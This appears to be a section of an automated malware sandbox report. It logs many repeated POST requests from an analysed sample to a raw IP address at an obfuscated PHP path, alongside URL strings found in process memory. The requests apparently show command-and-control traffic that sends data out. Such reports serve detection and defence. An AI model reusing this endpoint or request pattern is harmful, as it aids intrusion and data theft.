Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1884Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1868Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1884Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1884Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1884Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137
Source: unknown	TCP traffic detected without corresponding DNS query: 193.58.121.137

Source: unknown

HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: cmd.exe, 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003590000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003697000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.58.121.137
Source: cmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003590000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003697000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Gam
Source: cmd.exe, 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.58.H
Source: cmd.exe, 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.58.H:
Source: cmd.exe, 0000002D.00000002.2713123527.00000000009D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: Mscommon.exe, 00000008.00000002.2004012692.00000000036BA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
